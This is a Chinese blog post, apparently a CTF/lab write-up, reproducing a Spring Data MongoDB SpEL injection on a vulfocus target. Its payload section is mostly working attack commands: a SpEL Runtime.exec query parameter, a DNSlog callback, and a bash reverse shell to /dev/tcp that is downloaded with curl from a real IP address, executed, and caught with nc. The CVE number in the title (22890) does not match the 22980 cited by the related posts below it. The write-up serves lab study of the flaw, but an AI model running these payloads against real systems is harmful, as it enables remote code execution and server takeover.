【CTF】【cve_2022_22890】Spring Data MongoDB SpEL表达式注入漏洞

已于 2023-02-08 12:31:54 修改
阅读量524 收藏
点赞数
分类专栏: CTF 文章标签: mongodb
于 2023-02-08 12:15:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49879675/article/details/128932557
版权

漏洞描述

Spring Data MongoDB SpEL Expression injection Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的@Query@Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符.
该漏洞属于0 Click

影响版本

  • >=3.3.0 & <=3.3.4
  • 3.4.0

解决方法: 升级版本.
查看官网版本支持

漏洞复现

采用vulfocus平台上数据.

启动靶机

启动靶机

执行payload安装curl

请求方式: get
请求URL: /
请求参数(payload): ?name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('代码').

安装curl:

getRuntime().exec('apt-get update')
getRuntime().exec('apt-get install -y curl')

等待页面刷新完成即可.

测试curl

DNSlog网站: http://www.dnslog.cn/
测试:

getRuntime().exec('curl xxx.dnslog.cn')

访问dnslog
vulfocus官网上的可能是宽带不行,推荐搭建本地靶机.

反弹shell

写这个文章就是为了写这个

采用bash反弹:
文件内容:

bash -c 'exec bash -i >& /dev/tcp/ip/6666 0>&1'

开启服务

在攻击机上使用python开启临时web服务:

python -m http.server 7777

默认能访问的是当前文件夹.

测试访问

使用curl获取文件

getRuntime().exec('curl -o /tmp/1.sh http://139.224.42.111:7777/1.sh')

查看脚本文件是否被获取:
查看是否访问成功
等待页面加载完成即可.

开启监听 执行脚本

开启监控:

nc -lvnp 6666

开启监听

bash执行获取的脚本:

getRuntime().exec('bash /tmp/1.sh')

很快啊:
反弹成功
反弹成功,应用漏洞成功!

因林而聚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)分析与利用
不忘初心,护天下安全!
06-24 2054
Spring Data for MongoDBSpring Data 项目的一部分,该项目旨在为新的数据存储提供熟悉和一致的基于Spring的编程模型,同时保留存储的特定特征和功能。 6月20日,VMware发布安全公告,修复了Spring Data MongoDB中的一个SpEL 表达式注入漏洞CVE-2022-22980),该漏洞的CVSSv3评分为8.2。 Spring Data MongoDB应用程序在对包含查询参数占位符的SpEL表达式使用@Query或@Aggr
Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22890
Blue的博客
06-27 7614
Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。v3.4.0v3.3.0 to v3.3.41.环境搭建启动环境可以看到如下界面2、环境中默认是没有crul工具,通过命令下载一个curl工具这里尝试DNslog可以看到成功回显在自己服务器上写一个反弹shell脚本,并开启服务 下载文件到tmp目录下服务开启监
SPEL表达式及注入漏洞(1),网络安全开发基础不牢
最新发布
m0_61331491的博客
04-06 1069
在使用 SpEL 时,我们需要将表达式与 EvaluationContext 进行绑定,然后将表达式交给 SpEL 引擎执行。EvaluationContext 为 SpEL 引擎提供了上下文信息,使得 SpEL 引擎能够正确地解析表达式中的变量、函数等信息,从而求出表达式的结果SimpleEvaluationContext 和 StandardEvaluationContext 都是 SpEL 提供的 EvaluationContext 的实现类。
漏洞预警|Spring Data MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 522
近日网上有关于开源项目Spring Data MongoDB 存在SpEL表达式注入的信息,棱镜七彩安全研究院对漏洞进行了POC验证。
Apache Subversion Use-After-Free漏洞CVE-2022-24070)
murphysec的博客
04-19 582
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
关于Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)的预警提示
Gblfy_Blog
11-05 720
注入漏洞
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
CyberFastTrack_SP2020:Cyber​​ FastTrack 2020SpringCTF的文章和解决方案的集合
03-08
Cyber​​ FastTrack 2020年Spring 现在比赛已经结束,我们可以自由地“鼓励”分享解决方案和文章(根据比赛开始前计划组织者发送的电子邮件)。 作为赢家,我能够完成95%的挑战,但不幸的是,在进行FE06和BM03时,时间和精力都用光了。 这些是按问题类型和难度组织的: 一般的 简单 中等的 二进制漏洞利用 简单 中等的 BM03 (未解决) 难的 极端 法证 简单 中等的 难的 网络 中等的 难的 逆向工程 中等的 难的 极端 网络漏洞 简单 中等的 难的
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 1272
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
『Java CVECVE-2022-22980: Spring Data MongoDB SpEL 注入
Ho1aAs‘s Blog
08-09 1170
# 影响版本 Spring Data MongoDB: 3.3.0-3.3.4、3.4.0 # 漏洞原理 使用@Query或@Aggregation注解进行查询时,通过占位符获取输入参数可能会触发SpEL表达式解析
[JAVA安全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 1886
SPEL注入
Spring Data MongoDB 曝出 SpEL 表达式注入漏洞,OSCS开源社区建议开发者进行修复
OSCS开源安全社区
06-21 278
OSCS让每一个开源项目更安全漏洞
CVE-2022-22980 SpringData MongoDB SpEL表达式注入
qq_32445755的博客
11-13 819
SpringData是为了提供一个常见的、一致的数据访问模型,也就是说,它的目标就是为了能为所有数据库(包括关系型和非关系型)提供一致的数据操作接口,并且这些接口名非常通俗易懂,让人一看便知。它也是基于Spring框架的,即可以直接使用Spring的IoC和AOP等特性。
RoarCTF 2019Easy Calc表达式注入
4pri1
02-06 285
[RoarCTF 2019]Easy Calc表达式注入 - 幕布 接着发现了api的接口地点calc.php和get的参数 直接url后面加上calc.php显示了一部分源码 可以发现过滤了很多的东西,并且计算器的页面上是只允许输入数字的,所以可以用带空格的数字绕过(用? num代替?num) scandir("/")扫一下根目录,"/"被waf过滤了,单双引号也被过滤了。 ? num=var_dump(scandir(chr(47))) ?num=file_get_co
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值